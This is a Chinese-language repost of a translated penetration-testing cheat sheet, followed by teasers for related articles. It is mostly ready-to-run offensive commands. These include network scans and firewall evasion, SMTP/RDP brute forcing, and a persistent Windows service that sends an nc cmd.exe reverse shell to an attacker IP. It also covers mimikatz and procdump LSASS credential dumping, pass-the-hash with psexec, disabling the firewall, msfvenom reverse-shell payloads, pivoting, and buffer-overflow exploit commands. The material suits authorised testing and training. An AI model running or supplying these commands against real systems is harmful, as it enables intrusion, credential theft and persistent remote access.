滲透測試工具實戰技巧合集(一)

2021-01-19 皮魯安全之家

【新朋友】點擊標題下面藍字「皮魯安全之家」關注

【老朋友】點擊右上角,分享或收藏本頁精彩內容

【公眾號】搜索公眾號:皮魯安全之家,或者ID :piluwill

本文為作者總結自己在滲透測試中常用的一些小技巧。原文分為兩部分,譯者將其合二為一,方便大家查閱。


最好的 NMAP 掃描策略

$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'$ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt

Nmap – 躲避防火牆

$ nmap -f$ nmap --mtu 24$ nmap -D RND:10 [target]$ nmap -D decoy1,decoy2,decoy3 etc.$ nmap -sI [Zombie IP] [Target IP]$ nmap --source-port 80 IP$ nmap --data-length 25 IP$ nmap --spoof-mac Dell/Apple/3Com IP

Nmap 進行 Web 漏洞掃描

cd /usr/share/nmap/scripts/wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gznmap -sS -sV --script=vulscan/vulscan.nse targetnmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv targetnmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 targetnmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 targetnmap -sV --script=vuln targetnmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

使用 DIRB 爆破目錄

註:DIRB http://dirb.sourceforge.net/是一個專門用於爆破目錄的工具,在 Kali 中默認已經安裝,類似工具還有國外的patator https://github.com/lanjelot/patator,dirsearch https://github.com/maurosoria/dirsearch,DirBuster https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project, 國內的御劍等等。

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

Patator – 全能暴力破解測試工具

$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

使用 Fierce 爆破 DNS

註:Fierce 會檢查 DNS 伺服器是否允許區域傳送。如果允許,就會進行區域傳送並通知用戶,如果不允許,則可以通過查詢 DNS 伺服器枚舉主機名。類似工具:subDomainsBrute  https://github.com/lijiejie/subDomainsBrute 和 SubBrute https://github.com/TheRook/subbrute/ 等等

$ ./fierce.pl -dns example.com$ ./fierce.pl –dns example.com –wordlist myWordList.txt

使用 Nikto 掃描 Web 服務

nikto -C all -h http://IP

掃描 WordPress

git clone https://github.com/wpscanteam/wpscan.git && cd wpscan./wpscan –url http://IP/ –enumerate p

HTTP 指紋識別

wget http:cd httprint_301/linux/./httprint -h http:

使用 Skipfish 掃描

註:Skipfish 是一款 Web 應用安全偵查工具,Skipfish 會利用遞歸爬蟲和基於字典的探針生成一幅交互式網站地圖,最終生成的地圖會在通過安全檢查後輸出。

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http:

使用 NC 掃描

nc -v -w 1 target -z 1-1000for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan

註:Unicornscan http://www.unicornscan.org/ 是一個信息收集和安全審計的工具。

us -H -msf -Iv 192.168.56.101 -p 1-65535us -H -mU -Iv 192.168.56.101 -p 1-65535-H 在生成報告階段解析主機名-m 掃描類型 (sf - tcp, U - udp)-Iv - 詳細

使用 Xprobe2 識別作業系統指紋

xprobe2 -v -p tcp:80:open IP

枚舉 Samba

nmblookup -A targetsmbclient rpcclient -U "" targetenum4linux target

枚舉 SNMP

snmpget -v 1 -c public IPsnmpwalk -v 1 -c public IPsnmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

實用的 Windows cmd 命令

net localgroup Usersnet localgroup Administratorssearch dir/s *.docsystem("start cmd.exe /k $cmd")sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"Procdump.exe -accepteula -ma lsass.exe lsass.dmpmimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系統C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 位系統

PuTTY 連接隧道

轉發遠程埠到目標地址plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP

Meterpreter 埠轉發

meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141kali > rdesktop 127.0.0.1:3389

開啟 RDP 服務

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0netsh firewall set service remoteadmin enablenetsh firewall set service remotedesktop enable

關閉 Windows 防火牆

netsh firewall set opmode disable

Meterpreter VNC\RDP

# https:run getgui -u admin -p 1234run vnc -p 5043

使用 Mimikatz

獲取 Windows 明文用戶名密碼

git clone https:privilege::debugsekurlsa::logonPasswords full

獲取哈希值

git clone https:pth-winexe -U hash 或者apt-get install freerdp-x11xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP在或者meterpreter > run post/windows/gather/hashdumpAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcpmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf exploit(psexec) > exploitmeterpreter > shell

使用 Hashcat 破解密碼

hashcat -m 400 -a 0 hash /root/rockyou.txt

使用 NC 抓取 Banner 信息

nc 192.168.0.10 80GET / HTTP/1.1Host: 192.168.0.10User-Agent: Mozilla/4.0Referrer: www.example.com<enter><enter>

使用 NC 在 Windows 上反彈 shell

c:>nc -Lp 31337 -vv -e cmd.exenc 192.168.0.10 31337c:>nc example.com 80 -e cmd.exenc -lp 80nc -lp 31337 -e /bin/bashnc 192.168.0.10 31337nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

查找 SUID\SGID root 文件

find / -user root -perm -4000 -printfind / -group root -perm -2000 -printfind / -perm -4000 -o -perm -2000 -printfind / -nouser -printfind / -nogroup -printfind / -type l -ls

Python shell

python -c 'import pty;pty.spawn("/bin/bash")'

Python\Ruby\PHP HTTP 伺服器

python2 -m SimpleHTTPServerpython3 -m http.serverruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,
ocumentRoot => Dir.pwd).start"php -S 0.0.0.0:8888

獲取進程對應的 PID

fuser -nv tcp 80fuser -k -n tcp 80

使用 Hydra 爆破 RDP

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp

掛載遠程 Windows 共享文件夾

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Kali 下編譯 Exploit

gcc -m32 -o output32 hello.c (32 位)gcc -m64 -o output hello.c (64 位)

Kali 下編譯 Windows Exploit

wget -O mingw-get-setup.exe http:wine mingw-get-setup.exeselect mingw32-basecd /root/.wine/drive_c/windowswget http:cd /root/.wine/drive_c/MinGW/binwine gcc -o ability.exe /tmp/exploit.c -lwsock32wine ability.exe

NASM 命令

註:NASM 全稱 The Netwide Assembler,是一款基於80×86和x86-64平臺的彙編語言編譯程序,其設計初衷是為了實現編譯器程序跨平臺和模塊化的特性。

nasm -f bin -o payload.bin payload.asmnasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH 穿透

ssh -D 127.0.0.1:1080 -p 22 user@IPAdd socks4 127.0.0.1 1080 in /etc/proxychains.confproxychains commands target

SSH 穿透從一個網絡到另一個網絡

ssh -D 127.0.0.1:1080 -p 22 user1@IP1Add socks4 127.0.0.1 1080 in /etc/proxychains.confproxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2Add socks4 127.0.0.1 1081 in /etc/proxychains.confproxychains commands target

使用 metasploit 進行穿透

route add X.X.X.X 255.255.255.0 1use auxiliary/server/socks4arunproxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E或者meterpreter > ipconfigIP Address  : 10.1.13.3meterpreter > run autoroute -s 10.1.13.0/24meterpreter > run autoroute -p10.1.13.0          255.255.255.0      Session 1meterpreter > Ctrl+Zmsf auxiliary(tcp) > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 10.1.13.2msf exploit(psexec) > exploitmeterpreter > ipconfigIP Address  : 10.1.13.2

基於 CSV 文件查詢 Exploit-DB

git clone https://github.com/offensive-security/exploit-database.gitcd exploit-database./searchsploit –u./searchsploit apache 2.2./searchsploit "Linux Kernel"cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3

MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exemsfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.phpmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

MSF 生成在 Linux 下反彈的 Meterpreter Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF 生成反彈 Shell (C Shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

MSF 生成反彈 Python Shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF 生成反彈 ASP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

MSF 生成反彈 Bash Shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

MSF 生成反彈 PHP Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.phpadd <?php at the beginningperl -i~ -0777pe's/^/<?php \n/' shell.php

MSF 生成反彈 Win Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

Linux 常用安全命令

find / -uid 0 -perm -4000find / -perm -o=wfind / -name " " -printfind / -name ".." -printfind / -name ". " -printfind / -name " " -printfind / -nouserlsof +L1lsof -iarp -agetent passwdgetent groupfor user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; donecat /dev/urandom| tr -dc 『a-zA-Z0-9-_!@find . | xargs -I file lsattr -a file 2>/dev/null | grep 『^….i』chattr -i file

Windows 緩衝區溢出利用命令

msfvenom -p windows/shell_bind_tcp -a x86 msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 COMMONLY USED BAD CHARACTERS:\x00\x0a\x0d\x20                              For http request\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)# 常用命令:pattern createpattern offset (EIP Address)pattern offset (ESP Address)add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )!pvefindaddr pattern_create 5000!pvefindaddr suggest!pvefindaddr modules!pvefindaddr nosafeseh!mona config -set workingfolder C:\Mona\%p!mona config -get workingfolder!mona mod!mona bytearray -b "\x00\x0a"!mona pc 5000!mona po EIP!mona suggest

SEH – 結構化異常處理

註:SEH(「Structured Exception Handling」),即結構化異常處理,是 windows 作業系統提供給程序設計者的強有力的處理程序錯誤或異常的武器。

# https:# http:!mona suggest!mona nosafesehnseh="\xeb\x06\x90\x90" (next seh chain)iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

ROP (DEP)

註:ROP(「Return-Oriented Programming」)是計算機安全漏洞利用技術,該技術允許攻擊者在安全防禦的情況下執行代碼,如不可執行的內存和代碼籤名。

DEP(「Data Execution Prevention」)是一套軟硬體技術,在內存上嚴格將代碼和數據進行區分,防止數據當做代碼執行。

# https:# https:# https:# http:!mona modules!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)

ASLR – 地址空間格局隨機化

# https:# http:!mona noaslr

尋蛋(EGG Hunter)技術

Egg hunting這種技術可以被歸為「分級shellcode」,它主要可以支持你用一小段特製的shellcode來找到你的實際的(更大的)shellcode(我們的『雞蛋『),原理就是通過在內存中搜索我們的最終shellcode。換句話說,一段短代碼先執行,然後再去尋找真正的shellcode並執行。– 參考自看雪論壇 http://www.pediy.com/kssd/pediy11/120392.html,更多詳情可以查閱我在代碼注釋中增加的連結。

!mona jmp -r esp!mona egg -t lxxl\xeb\xc4 (jump backward -60)buff=lxxllxxl+shell!mona egg -t 'w00t'

*原文:jivoi http://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/,xiaix編譯,來自FreeBuf




回復

獲得以下圖文等信息

論壇

可進入微論壇暢談

任意

官方機器人陪聊

首頁

查看技術文檔(逐步更新中)

留言

進入留言板

相冊

國內外大牛真容


相關焦點

  • 滲透測試神器Cobalt Strike使用教程
    Cobalt Strike是一款滲透測試神器,常被業界人稱為CS神器。Cobalt Strike已經不再使用MSF而是作為單獨的平臺使用,它分為客戶端與服務端,服務端是一個,客戶端可以有多個,可被團隊進行分布式協團操作。
  • 分階段滲透測試完全手冊
    通常情況下,如果發生以下任一情況,我們都應立即安排執行滲透測試: 網絡或基礎設施發生重大變化 剛打上了安全修補程序 增添了新的應用程式或基礎設施 更改了辦公室的位置,以及對應的網絡 新頒布了行業法律與法規 新的威脅或漏洞被媒體披露
  • 網站滲透測試報告速寫模板指南
    網站滲透測試服務在給客戶寫報告模板或者檢查表的時候,應逐步完善。寫報告在滲透測試中耗費大量的時間和精力。花費的時間取決於客戶和經理期望的交付成果。(中文大概意思是客戶和老闆能不能看懂你的報告)獎勵項目報告通常比滲透測試報告短,但是無論什麼格式,您都將受益於為每個文檔和測試類型創建模板(黑盒、白盒、Web、網絡、wifi)。理想情況下,您的滲透測試模板應包括:通常測試的測試列表。有時候客戶會問這個,提前做好準備。
  • 內網滲透|ATT&CK紅隊評估實戰靶場-2
    win2008r2:192.168.52.138(Nat網卡) VM3拓撲圖如上,上一篇已經拿到了VM1的shell,且進行了主機與域內信息收集,通過收集的信息已經確定了域控ip,和大致能描繪出內網基本拓撲圖,如上期所說,此靶場難度為易,非常適合練習內網滲透各種姿勢
  • BlackArch Linux 2020.12.01 發布,滲透測試發行版
    時隔半年,BlackArch Linux 發布了2020年的最後一次版本更新 2020.12.01,新版本增加了超過 100 款工具
  • 滲透測試 BlackArch Linux 發布 2020 年第一個版本
    BlackArch Linux 發布了 2020 年第一個版本的 ISO 和 OVA 鏡像,此版本對系統提供的所有軟體包和工具都進行了許多改進和質量檢查。BlackArch Linux 是一個基於 Arch Linux 的滲透測試發行版,它預裝了 2400 種專用工具以用於滲透測試和計算機取證分析。
  • 十三種好用的免費安全測試工具
    可以說:如果您正在考慮全面地加固DevOps管道安全性的話,那麼DevSlop就是一款非常不錯的入門級工具與資源。4.作為有效負載與腳本的結合,Nishang允許用戶使用PowerShell來進行滲透式、攻擊性安全、以及紅隊(Red Teaming,譯者註:是在傳統滲透測試的基礎上,更著重於針對企業人員、業務系統、供應鏈、辦公系統、物理安全等方面真實脆弱點的攻擊評估。)測試。用戶可以在當前滲透測試的各個階段使用到該工具。7.
  • 這10個安全測試工具,優秀且免費
    有不少開發人員覺得安全測試是最難以實現自動化的部分,其實這主要是由於沒有找到合適的工具來進行測試。今天給大家介紹10個易用、開源且免費的安全測試工具,希望能夠對你有幫助。Nishang是有效負載與腳本的結合,可以用PowerShell來進行滲透式、攻擊性安全、以及紅隊測試。測試人員可以在當前滲透測試的各個階段使用到該工具。2、TaipanTaipan是自動化的Web應用類漏洞掃描程序,能自動化進行Web漏洞的識別。
  • 電影合集怎麼剪輯:編輯視頻的工具就用它(優質分享)
    朋友的這個問題,也是讓小北十分的無奈了,想要迅速掌握視頻剪輯的技巧,哪裡能那麼容易呢?不過想到朋友對於剪輯視頻的效果應該要求也不高,於是就介紹了一款簡單的視頻剪輯工具給它,全程傻瓜式的操作,應該很適合新手了!
  • Goby - 新一代安全工具
    Goby是一款新的網絡安全測試工具,由趙武Zwell(Pangolin、JSky、FOFA作者)打造,它能夠針對一個目標企業梳理最全的攻擊面信息,同時能進行高效、實戰化漏洞掃描,並快速地從一個驗證入口點,切換到橫向。我們希望能夠輸出更具生命力的工具,能夠對標黑客的實際能力,幫助企業來有效地理解和應對網絡攻擊。
  • 網站安全測試的工具有哪些?
    有哪些比較優秀的網站安全監測de的工具和軟體?我們來看看安全測試人員常用的十種優秀的開源工具:1. NetSparker作為一款一站式的工具,NetSparker能夠滿足絕大多數網絡的安全需求。它既可以被用在宿主機上,又可以被作為自託管解決方案的一部分。該平臺能夠非常容易地完全集成到,現有的任何一種測試環境或開發環境中。
  • 「行業名詞」滲透測試團隊和紅隊
    滲透測試團隊和紅隊Penetration Testing and Red Team 滲透測試團隊一般執行的任務是對網絡、應用程式、及硬體等方面進行嚴格全面的測試。首先需要的是確定滲透測試的範圍,然後在範圍中選定目標進行詳細的信息收集,進行了充分的信息收集之後再進行下一步的漏洞挖掘和漏洞利用,以及後滲透階段和最終完成滲透測試報告等所有工作。a這種類型的測試使用了一個漏洞挖掘、漏洞修補以及可控性的測試方法的整體模型。而紅隊的側重點及存在意義則不太一樣。
  • 《風雲島行動》霍金斯實戰有什麼技巧 霍金斯實戰技巧介紹
    《風雲島行動》霍金斯實戰有什麼技巧 霍金斯實戰技巧介紹 作者:網際網路 來源:九遊 發布時間:2020-03-11 14:00:00手機訂閱
  • 如何成為滲透測試員(你也可以理解為黑客)?
    你必須對它充滿熱情('黑客,網絡安全,測試等');你必須學習黑客工具以及懂得如何最好地使用它們;參與認證很重要,也很有幫助!CEH,CISSP,Security+,OSCP,C)PTE大量的學習,及時掌握各種前沿的技巧等SulemanMalik[取自Suleman的TED簡介]SulemanMalik是一位專注且資源豐富的計算機專業人員,在網絡安全,滲透測試,安全研究,恢復和維護各種硬體和軟體方面擁有9年以上的豐富學習經驗。他在利茲工作,目前是全日制學者,學習計算機取證與安全。
  • 免費在線工具合集,生活常用、教育學習、辦公輔助、圖片視頻……
    Tooleyes支持平臺:WebTooleyes 是一個致力於打造和收集各種實用在線工具的工具合集類網站 。網站目前收集了生活常用 、教育學習 、辦公輔助 、圖片視頻 、網絡工具和程序開發等多種類型 ,近百種實用工具 。
  • 街霸對決有哪些小技巧-實戰技巧分享
    街霸對決有哪些小技巧?《街霸:對決》是國內首款由卡普空正版授權街霸IP的 正版手遊,即時戰鬥對抗玩法,瞬間逆轉勝負。下面爪遊控為大家帶來街霸對決實戰技巧分享,希望可以幫助到大家。
  • 《凹凸世界》雷德實戰打法技巧攻略 雷德實戰有什麼技巧
    導 讀 在凹凸世界手遊中雷德實戰究竟該怎麼打呢?
  • 《刺客信條奧德賽》噩夢難度強力流派選擇推薦 各流派實戰技巧詳解
    遊戲中主要以獵人流、刺客流及戰士流位主流派,不同流派戰鬥實力有強有弱,這裡給大家帶來了刺客信條奧德賽噩夢難度強力流派及實戰合集,一起看下視頻吧。 【流派玩法攻略推薦】 ... 刺客信條奧德賽流派選擇哪個好?
  • 7月超實用設計工具大合集,包含色彩、網頁、字體等,快碼起來!
    隨著工作場景的變化,我們很清晰地看到如今的設計、開發和協作開始全方位向著遠程協同這一場景靠攏。這種情況在這些新晉的設計工具上體現得非常明顯。無論是最新的設計資源合集Webdesign Toolbox還是新晉的開發協同代碼工具 Code Stream,都體現出這樣的特點。
  • 您需要知曉的20款測試工具庫
    本文向您介紹20種自動化測試工具與庫,其中包括一些對於自動化測試、單元測試、以及各種其他類型測試需求非常實用的工具。希望它們能夠對您的項目有所幫助。同時,它能夠提供一種能夠在多臺計算機上並行運行測試的簡便方法。Selenium IDE可以被用於Web的開源記錄和回放自動化測試。許可證:開源2.AppiumAppium是一款開源、且跨平臺的自動化測試工具。它適用於原生的移動Web、以及混合式的桌面應用。